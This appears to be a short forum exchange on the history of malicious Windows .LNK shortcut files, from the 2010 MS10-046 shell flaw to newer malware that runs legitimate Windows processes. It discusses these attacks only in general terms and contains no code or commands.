They were used at least as far back as 2010: Downloader-CJX Cashing In on Microsoft .LNK Flaw http://www.avertlabs.com/research/blog/index.php/category/exploit-research/ Microsoft Security Bulletin MS10-046 - Critical Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198 ) Published: August 02, 2010 https://technet.microsoft.com/en-us/library/security/ms10-046.aspx As with so many exploits patched by Microsoft, many users did not patch, so the exploit continued to be used successfully for quite a while. “double click for content” is an old lure that goes back at least to 2009. An RTF example: http://rsjphoto.net/computing/rtf/ There you go! ---- rich
The difference with the current .lnk malware versus past use is those exploited vulnerabilities. The current strain of malware is using .lnk files as designed but using them to run legit processes such as mshata.exe to in turn run malware laced scripts and the like. Nothing like using Windows to infect Windows
Yes! In one sense, though, many exploits use Windows to infect Windows - the orginal LNK exploit used a vulnerability in the Windows Shell. Not using a legitimate file as in this case, of course... which reminds me of Conficker's later versions which used autorun to start rundll32.exe to run its malicious DLL. ---- rich